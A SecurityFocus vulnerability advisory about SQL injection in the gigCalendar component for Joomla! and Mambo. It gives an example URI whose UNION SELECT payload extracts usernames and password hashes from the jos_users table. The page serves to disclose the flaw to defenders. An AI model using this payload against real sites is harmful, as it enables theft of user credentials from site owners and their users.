Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Joomla! and Mambo gigCalendar Component 'venuedetails.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/path/index.php?option=com_gigcal&task=details&gigcal_venues_id=-1'
UNION ALL SELECT 1,concat('username: ',
username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password:
', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23







 

Privacy Statement
Copyright 2008, SecurityFocus